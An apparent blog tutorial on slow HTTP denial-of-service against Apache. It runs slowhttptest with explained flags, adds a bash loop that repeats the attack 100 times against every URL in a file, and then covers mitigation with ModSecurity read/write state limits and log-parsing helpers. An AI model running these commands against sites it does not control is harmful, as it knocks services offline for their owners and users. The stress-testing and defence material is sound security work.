In layman's terms, a slow DoS attack on port 80 fills Apache's worker slots with connections that sit in the "R" (reading request) and "W" (sending reply) states of the scoreboard until no worker is left for real clients.

Once every slot is taken Apache stops answering; stop the attack and your website is back online.

Let's start with this:

we need the slowhttptest tool to test slow attacks and ModSecurity (ModSec) to prevent them.

1. Slowhttp test installation

  • Download slowhttptest

wget http://slowhttptest.googlecode.com/files/slowhttptest-1.5.tar.gz

  • tar -xzvf slowhttptest-1.5.tar.gz
  • cd slowhttptest-1.5
  • ./configure && make && make install

2. ModSec Installation

Please follow this link to install ModSec:

http://www.tecmint.com/protect-apache-using-mod_security-and-mod_evasive-on-rhel-centos-fedora/

Note ** Do not install mod_evasive (not required for this test)

3. Now let's hit the road and take the website down 😉

slowhttptest -c 1000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.example.com.au -p 3

-X : slow read mode (send a complete request, then read the response a few bytes at a time)

-c 1000 : 1000 connections

-r 200 : 200 new connections per second

-w 512 -y 1024 : the TCP receive window advertised on each connection is picked at random between 512 and 1024 bytes, so the server can only push a few bytes of the reply at a time

-n 5 -z 32 : read 32 bytes from the socket every 5 seconds

-u : URL (target)

-k 3 : number of times to repeat the same request in the connection (pipelining)

-p 3 : seconds to wait for an HTTP response on the probe connection, after which the server is considered inaccessible (default: 5)

and bang, it's down.

[Image: slowhttptest output while the target is down]

Now, let's check what was happening on the server:

root@bt [~]# service httpd status

[Image: output of service httpd status during the attack]

No space for new connections 😀 ... isn't that fun???
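To see the same thing without a screenshot, here is an added example (not from the original post) that checks two things on the server side: the mod_status scoreboard, where every character is one worker slot, and the number of established port-80 connections per client. The two inputs are constructed samples; on a real box you would feed in `curl -s http://localhost/server-status?auto` (with ExtendedStatus on) and `netstat -ant`, and the addresses below are documentation-range placeholders.

```shell
#!/usr/bin/env bash
# Added example: spot a slow DoS from the server side.
# Both inputs are constructed samples, not real captures.

# What /server-status?auto looks like: every character of the Scoreboard is
# one worker slot. R = reading request, W = sending reply, _ = idle worker
# waiting for a connection, . = open slot with no process.
SAMPLE_STATUS='Total Accesses: 1234
BusyWorkers: 7
IdleWorkers: 1
Scoreboard: RRRWWW_R'
SAMPLE_STATUS_FULL='BusyWorkers: 8
IdleWorkers: 0
Scoreboard: RRRRWWWR'

# Constructed "netstat -ant" lines: one client holding many port-80 sockets.
SAMPLE_NETSTAT='tcp 0 0 10.0.0.5:80 203.0.113.9:51234 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:51235 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:51236 ESTABLISHED
tcp 0 0 10.0.0.5:80 198.51.100.7:40001 ESTABLISHED
tcp 0 0 10.0.0.5:22 198.51.100.7:40002 ESTABLISHED
tcp 0 0 10.0.0.5:80 203.0.113.9:51237 TIME_WAIT'

# count_state STATUS CHAR: number of scoreboard slots in state CHAR.
count_state() {
  printf '%s\n' "$1" | sed -n 's/^Scoreboard: //p' | tr -cd "$2" | wc -c | tr -d ' '
}

# check_scoreboard STATUS: print the per-state counts; exit status 1 when no
# slot is free, which is exactly the "no space for new connections" condition.
check_scoreboard() {
  local r w idle open
  r=$(count_state "$1" R); w=$(count_state "$1" W)
  idle=$(count_state "$1" _); open=$(count_state "$1" .)
  printf 'reading=%s sending=%s idle=%s open=%s\n' "$r" "$w" "$idle" "$open"
  [ $((idle + open)) -gt 0 ]
}

# top_clients NETSTAT_OUTPUT PORT: established connections per remote IP on
# PORT, busiest first. One IP near your worker limit is the slow DoS signature.
top_clients() {
  printf '%s\n' "$1" | awk -v port="$2" '
    $NF == "ESTABLISHED" && $4 ~ (":" port "$") {
      split($5, a, ":"); n[a[1]]++
    }
    END { for (ip in n) print n[ip], ip }' | sort -rn
}

# top_client_count NETSTAT_OUTPUT PORT: just the count for the busiest client.
top_client_count() {
  top_clients "$1" "$2" | head -n 1 | cut -d' ' -f1
}

check_scoreboard "$SAMPLE_STATUS" || echo 'no free worker slots'
top_clients "$SAMPLE_NETSTAT" 80
```

Compare the busiest client's count with MaxClients: if one address holds most of the busy slots while idle and open slots are near zero, you are looking at this attack rather than at legitimate load.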

Con: by default slowhttptest runs for 240 seconds and then stops (the -l option sets the test length in seconds).

A con? Not for scripters :) The script below runs 100 iterations against each URL listed in /root/url.txt (one per line).

#!/usr/bin/env bash
# Repeat the slow read test 100 times against every URL in /root/url.txt
while read -r url; do
    [ -n "$url" ] || continue
    for (( i = 1; i <= 100; i++ )); do
        /usr/local/bin/slowhttptest -c 1000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u "$url" -p 3
    done
done < /root/url.txt

slowhttptest has many more options, which you can explore with -h.

Use them as your test requires 😉

Prevention:

ModSec, (bow). personally I am a big fan of this module.

  • In your httpd.conf there has to be a line including the ModSec conf file, as shown below:

-bash-4.1# cat /etc/httpd/conf/httpd.conf | grep -i modsec

Include "/usr/local/apache/conf/modsec2.conf"

  • Open that file and add the directives below:

SecReadStateLimit 100

SecWriteStateLimit 100

With these directives ModSecurity rejects any further connection from a client IP that already has 100 connections in the READ (or WRITE) state, as the error_log shows:

[Tue Jan 15 19:34:21 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:24 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:27 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from xxx.xxx.xxx.xxx - Possible DoS Consumption Attack [Rejected]

and the website keeps working fine 😉

Apache's status while the attack is still ON:

[Image: Apache status with the ModSec limits in place while the attack is still on]
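As an added example (not part of the original post), here is a small shell function that summarizes these ModSecurity rejections from error_log per source IP and scoreboard state, which is what you want to look at before deciding whether to drop a source at the firewall. The log lines are constructed in the same format as the ones above, with documentation-range addresses standing in for the masked xxx.xxx.xxx.xxx.

```shell
#!/usr/bin/env bash
# Added example: summarize ModSecurity "Possible DoS Consumption Attack"
# rejections. The lines below are constructed in the error_log format shown
# above; the IPs are placeholders.
SAMPLE_ERRLOG='[Tue Jan 15 19:34:21 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from 203.0.113.9 - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:24 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from 203.0.113.9 - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:27 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in WRITE state from 203.0.113.9 - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:30 2013] [warn] ModSecurity: Access denied with code 400. Too many threads [101] of 100 allowed in READ state from 198.51.100.7 - Possible DoS Consumption Attack [Rejected]
[Tue Jan 15 19:34:31 2013] [error] [client 198.51.100.7] File does not exist: /var/www/html/favicon.ico'

# dos_rejections LOG: one line per (ip, state) pair, "<count> <ip> <STATE>",
# most-rejected first. Only lines carrying the DoS marker are counted.
dos_rejections() {
  printf '%s\n' "$1" | awk '
    /Possible DoS Consumption Attack/ {
      # ... allowed in <STATE> state from <IP> - Possible ...
      for (i = 1; i <= NF; i++) {
        if ($i == "in" && $(i+2) == "state") state = $(i+1)
        if ($i == "from") ip = $(i+1)
      }
      n[ip " " state]++
    }
    END { for (k in n) print n[k], k }' | sort -rn
}

# dos_offenders LOG THRESHOLD: IPs rejected at least THRESHOLD times in any
# single state. Once you have looked at the list, it can feed the firewall:
#   dos_offenders "$(cat /var/log/httpd/error_log)" 50 | while read -r ip; do iptables -I INPUT -s "$ip" -j DROP; done
dos_offenders() {
  dos_rejections "$1" | awk -v t="$2" '$1 >= t+0 { print $2 }' | sort -u
}

# dos_limit LOG: the limit as ModSecurity reports it ("of 100 allowed"), to
# confirm the running config matches what you put in modsec2.conf.
dos_limit() {
  printf '%s\n' "$1" | sed -n 's/.*of \([0-9]*\) allowed.*/\1/p' | sort -u
}

dos_rejections "$SAMPLE_ERRLOG"
```

Rejections spread over many addresses, rather than a few heavy ones, mean the per-IP limit is not going to help and the attack needs rate limiting upstream instead.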

Note **

  • SecReadStateLimit and SecWriteStateLimit are per client IP: one source may hold at most that many connections in the READ (or WRITE) state before the next one is rejected with a 400. Set them well below two Apache parameters,
ServerLimit
MaxClients
otherwise a single client can still exhaust the worker pool before the limit kicks in.
  • Set both limits: slow headers (-H) and slow body (-B) attacks keep workers in the R state, while a slow read (-X) keeps them in the W state as the reply is being sent.
  • ServerLimit and MaxClients should be set according to the memory on the server.
  • Because the limit is per IP, an attacker spread across many addresses, or many legitimate users behind one NAT, need different numbers; watch the error_log before tightening.
  • Newer ModSecurity 2.x releases also accept these directives under the names SecConnReadStateLimit and SecConnWriteStateLimit.

This is it!!!